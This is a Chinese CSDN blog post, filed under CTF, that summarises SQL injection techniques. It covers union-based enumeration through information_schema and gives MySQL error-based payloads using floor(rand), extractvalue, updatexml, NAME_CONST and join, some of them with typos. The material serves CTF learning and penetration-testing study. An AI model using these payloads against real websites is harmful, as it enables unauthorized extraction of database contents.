SQL注入解题技巧

最新推荐文章于 2024-05-15 09:39:13 发布
最新推荐文章于 2024-05-15 09:39:13 发布
阅读量522 收藏 1
点赞数
分类专栏: 技术 CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44699871/article/details/100528588
版权
技术 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
CTF
3 篇文章 0 订阅
订阅专栏

1.常规思路

************数据回显注入

1 针对可疑的注入点进行测试,测试方式根据数据库类型的不同也有所不同:

SQLi备忘录:
http://pentestmonkey.net/category/cheat-sheet/sql-injection
2 测试源语句查询字段数
使用order by 语法,确定字段数。这个语句的意思是按照第n列排序,若order by 8正常,order by 9报错的话就表示原查询语句查询结果为9列。
3 确定显示位

可以先尝试用select 1,2,3,4,5……,n#来检测,然后直接找相应数字出现的位置即可。之后的查询语句,最好用@或者NULL,类似 select @,@,@#
、select NULL,NULL,NULL# 可以保证不会因为数据类型不匹配而测试失败;

PS:union 查询需要保证前后两个语句的查询列数相同,以及数据类型相同或相似。前者可以通过order by和其它姿势探测,后者使用NULL、@来避免。
类似题型参考 ——i春秋 “百度杯”CTF比赛 九月场 SQL

4 查询数据库名
通用框架:Select group_concat(schema_name) FROM information_schema.schemata
变形:
查询表名:

select group_concat(table_name) from information_schema.tables where table_schema='xxx'

查询列名:

Select groupc_concat(column_name) from information_schema.columns where table_name=’xxxxx’

爆数据:

select group_concat(column_name) from table_name

************报错注入

1.group by
报错原理:
http://www.jinglingshu.org/?p=4507
语法:

and select 1 from (select count(*),concat(version),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.ExtractValue
报错原理:
http://wt7315.blog.51cto.com/10319657/1891458
语法:

and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)))

3.UpdateXml
报错原理:
http://wt7315.blog.51cto.com/10319657/1891458
语法:

 and 1=(updatexml(1,concat(0x3a,(select user())),1))

4.NAME_CONST
原理:
http://www.2cto.com/article/201203/121491.html
语法:

and+1=(select+*+from+(select+NAME_CONST(PAYLOAD,1),NAME_CONST(PAYLOAD,1))+as+x)

5.join
原理:
http://www.jinglingshu.org/?p=4507
语法:

select * from(select * form mysql.user a join mysql.user b using(Host))c
Lesliecc96
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
m0_67392811的博客
06-12 5781
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
常见SQL注入手法总结与技巧(一)
sechelper的博客
02-11 1245
SQL注入产生本质,盲注基本原理的详解与技巧,union联合注入演示
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2414
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
推荐开源项目:超级SQL注入工具(SSQLInjection)
最新发布
gitblog_00017的博客
05-15 352
推荐开源项目:超级SQL注入工具(SSQLInjection) 1、项目介绍 项目地址:https://gitcode.com/shack2/SuperSQLInjectionV1 在网络安全领域中,SQL注入是一种常见的攻击手段,而防御和检测这种攻击的关键在于理解其工作原理。这就是超级SQL注入工具(SSQLInjection) 的价值所在。这是一个专为渗透测试人员和信息安全工程师打造的强大的S...
实验吧简单的sql注入解题思路
ZweLL032的博客
03-17 8286
解题思路:研究了好久,看了writeup才知道 1)在文本框输入1,提交,链接变成id=1 2)在文件框输入1‘,提交,报错,判断存在注入。3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag fro
SQL注入天书 sqli-labs
01-11
sqli-labs是一个精心设计的在线实验室,它包含了多个级别的SQL注入练习,从基础到高级,逐步引导学习者掌握不同类型的SQL注入技巧。每个级别都有详细的说明和解题提示,帮助学习者理解漏洞的成因和利用方法,以及...
80.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)_杨秀璋的专栏-CSDN博客1
08-03
SQL注入是攻击者通过输入恶意SQL语句来控制或获取数据库信息的一种攻击手段。作者可能介绍了如何识别SQL注入漏洞,以及利用注入漏洞进行数据提取或系统控制的方法。解题思路可能包括利用payload构造、错误信息的捕获...
001-CTF web题型解题技巧-第一课 解题思路.pdf
07-09
以及各种代码审计工具,如Sqlmap,用于SQL注入攻击检测。熟悉并熟练运用这些工具,能够帮助快速定位问题和发掘隐藏信息。 在解题过程中,直接查看网页源码是基础操作。很多情况下,flag或者其他关键信息会被直接或...
ASP+sql精品在线试题库设计+论文.zip
03-07
此外,还需要考虑到防止SQL注入攻击,以确保系统的安全性。 7. 性能优化:对于大量试题和用户,可能需要考虑使用缓存技术(如ASP.NET的Cache对象)来提高页面加载速度,或者利用SQL的索引和查询优化来提升数据检索...
CTF web安全经典例题讲解
10-22
综上所述,"CTF web安全经典例题讲解"是一个全面覆盖Web安全关键领域的学习资源,包括SQL注入的检测与防御、密码学基础应用、文件上传漏洞的识别与修复、Web权限提升的防范以及抓包改包技巧的实践。对于希望在网络...
超级SQL注入工具【SSQLInjection】V1.0 正式版 20180809
10-23
软件运行需要.net framework 4.0,如未安装,请自行百度下载安装。
ACCESS中使用SQL语句应注意的地方及几点技巧
11-22
ACCESS中使用SQL语句应注意的地方及几点技巧ACCESS中使用SQL语句应注意的地方及几点技巧
SQL INJECTION注入之经典教程
06-28
关于SQL注入的两篇经典文章,国外的专业机构写的.对于有一定SQL编程经验又想了解SQL inject的人来说是不错的教程.
超级SQL注入工具
03-31
超级SQL注入工具
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
【SQL语句】SQL语句大全之技巧篇
weixin_55018452的博客
02-10 677
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言1、1=1,1=2的使用,在SQL语句组合时用的较多2、压缩数据库3、转移数据库给新用户以已存在用户权限4、检查备份集5、修复数据库6、说明:更改某个表7、存储更改全部表8、SQL SERVER中直接循环写入数据总结 前言 SQL语句大全之技巧篇。 提示:以下是本篇文章正文内容,下面案例可供参考 1、1=1,1=2的使用,在SQL语句组合时用的较多 “where 1=1” 是表示选择全部 “where 1=2”全部不选
SQL语句查询技巧 如何多表查询
JOKER_SAMA的博客
08-29 2681
tip:聚合函数只能用在select或者having条件之后。 用limit取代子查询 适用于查询最大,最小值的情况。比如 查询Score表中的最高分的学生学号和课程号。 可以先查出最高分的的分值然后再条件查询 select sno, cno from score where degree = (select max(degree) from s...
java数据库编程(4) 使用execute方法执行SQL语句
weixin_39452731的博客
10-11 9770
Statement的execute()语句可以执行任何SQL语句,但是它比较麻烦,故通常应该使用executeQuery()或者executeUpdate()方法。 使用exrcute()方法执行只是返回boolean值,它表示执行该SQL语句是否返回了ResultSet对象,如果需要获取ResultSet对象的话,可以使用下面两个方法: getResultSet()获取该Statement执...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值